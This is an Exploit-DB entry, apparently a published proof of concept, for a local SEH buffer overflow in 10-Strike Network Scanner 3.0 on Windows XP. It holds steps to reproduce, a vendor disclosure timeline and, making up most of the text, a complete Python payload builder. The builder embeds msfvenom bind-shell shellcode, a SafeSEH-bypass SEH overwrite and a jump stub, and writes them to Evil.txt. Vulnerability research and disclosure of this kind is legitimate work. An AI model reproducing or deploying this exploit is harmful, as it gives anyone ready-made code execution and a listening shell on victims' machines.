10-Strike Network Scanner 3.0 - Local Buffer Overflow (SEH)

EDB-ID: 44841
Author: Hashim Jawad
Published: 2018-06-05
CVE: N/A
Type: Local
Platform: Windows_x86
Vulnerable App: N/A

 # Exploit Author: Hashim Jawad - ihack4falafel 
# Date: 2018-06-05
# Vendor Homepage: https://www.10-strike.com/
# Vulnerable Software: https://www.10-strike.com/network-scanner/network-scanner.exe
# Tested on: Windows XP Professional - SP3 (x86)
# Disclosure Timeline:
# 06-02-18: Contacted vendor, no response
# 06-03-18: Contacted vendor, no response
# 06-04-18: Contacted vendor, no response
# 06-05-18: Proof of concept exploit published

# Steps to reproduce:
# - Copy contents of Evil.txt and paste in 'Host name or address' field under Add host.
# - Right-click on newly created host and click 'Trace route...'.
# - Repeat the second step and boom.
# Notes:
# - '\x00' get converted to '\x20' by the program eliminating the possibility of using [pop, pop, retn] pointers in base binary.
# - All loaded modules are compiled with /SafeSEH.
# - Right-click on newly created host and click 'System information>General' is effected by the same vulnerability with different
# offsets and buffer size.
# - [email protected]:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -v shellcode -f python
# - Payload size: 355 bytes

#!/usr/bin/python

shellcode = ""
shellcode += "\xb8\x2b\x29\xa7\x48\xd9\xe8\xd9\x74\x24\xf4\x5b"
shellcode += "\x29\xc9\xb1\x53\x31\x43\x12\x03\x43\x12\x83\xc0"
shellcode += "\xd5\x45\xbd\xea\xce\x08\x3e\x12\x0f\x6d\xb6\xf7"
shellcode += "\x3e\xad\xac\x7c\x10\x1d\xa6\xd0\x9d\xd6\xea\xc0"
shellcode += "\x16\x9a\x22\xe7\x9f\x11\x15\xc6\x20\x09\x65\x49"
shellcode += "\xa3\x50\xba\xa9\x9a\x9a\xcf\xa8\xdb\xc7\x22\xf8"
shellcode += "\xb4\x8c\x91\xec\xb1\xd9\x29\x87\x8a\xcc\x29\x74"
shellcode += "\x5a\xee\x18\x2b\xd0\xa9\xba\xca\x35\xc2\xf2\xd4"
shellcode += "\x5a\xef\x4d\x6f\xa8\x9b\x4f\xb9\xe0\x64\xe3\x84"
shellcode += "\xcc\x96\xfd\xc1\xeb\x48\x88\x3b\x08\xf4\x8b\xf8"
shellcode += "\x72\x22\x19\x1a\xd4\xa1\xb9\xc6\xe4\x66\x5f\x8d"
shellcode += "\xeb\xc3\x2b\xc9\xef\xd2\xf8\x62\x0b\x5e\xff\xa4"
shellcode += "\x9d\x24\x24\x60\xc5\xff\x45\x31\xa3\xae\x7a\x21"
shellcode += "\x0c\x0e\xdf\x2a\xa1\x5b\x52\x71\xae\xa8\x5f\x89"
shellcode += "\x2e\xa7\xe8\xfa\x1c\x68\x43\x94\x2c\xe1\x4d\x63"
shellcode += "\x52\xd8\x2a\xfb\xad\xe3\x4a\xd2\x69\xb7\x1a\x4c"
shellcode += "\x5b\xb8\xf0\x8c\x64\x6d\x6c\x84\xc3\xde\x93\x69"
shellcode += "\xb3\x8e\x13\xc1\x5c\xc5\x9b\x3e\x7c\xe6\x71\x57"
shellcode += "\x15\x1b\x7a\x46\xba\x92\x9c\x02\x52\xf3\x37\xba"
shellcode += "\x90\x20\x80\x5d\xea\x02\xb8\xc9\xa3\x44\x7f\xf6"
shellcode += "\x33\x43\xd7\x60\xb8\x80\xe3\x91\xbf\x8c\x43\xc6"
shellcode += "\x28\x5a\x02\xa5\xc9\x5b\x0f\x5d\x69\xc9\xd4\x9d"
shellcode += "\xe4\xf2\x42\xca\xa1\xc5\x9a\x9e\x5f\x7f\x35\xbc"
shellcode += "\x9d\x19\x7e\x04\x7a\xda\x81\x85\x0f\x66\xa6\x95"
shellcode += "\xc9\x67\xe2\xc1\x85\x31\xbc\xbf\x63\xe8\x0e\x69"
shellcode += "\x3a\x47\xd9\xfd\xbb\xab\xda\x7b\xc4\xe1\xac\x63"
shellcode += "\x75\x5c\xe9\x9c\xba\x08\xfd\xe5\xa6\xa8\x02\x3c"
shellcode += "\x63\xd8\x48\x1c\xc2\x71\x15\xf5\x56\x1c\xa6\x20"
shellcode += "\x94\x19\x25\xc0\x65\xde\x35\xa1\x60\x9a\xf1\x5a"
shellcode += "\x19\xb3\x97\x5c\x8e\xb4\xbd"

magic = '\xd9\xee' # fldz
magic += '\xd9\x74\x24\xf4' # fnstenv [esp-0xc]
magic += '\x59' # pop ecx
magic += '\x80\xc1\x05' # add cl,0x5
magic += '\x80\xc1\x05' # add cl,0x5
magic += '\x90' # nop
magic += '\xfe\xcd' # dec ch
magic += '\xfe\xcd' # dec ch
magic += '\xff\xe1' # jmp ecx

buffer = '\x90' * 28 # nops
buffer += shellcode # bind shell
buffer += '\xcc' * (516-28-len(shellcode)) # filler to nSEH
buffer += '\x75\x06\x74\x06' # nSEH | jump net
buffer += '\x18\x05\xfc\x7f' # SEH | 0x7ffc0518 : pop edi # pop edi # ret [SafeSEH Bypass]
buffer += '\x90' * 5 # nops
buffer += magic # jump -512
buffer += '\xcc' * (3000-516-4-4-5-len(magic)) # junk

try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except Exception as e:
print e

Related Posts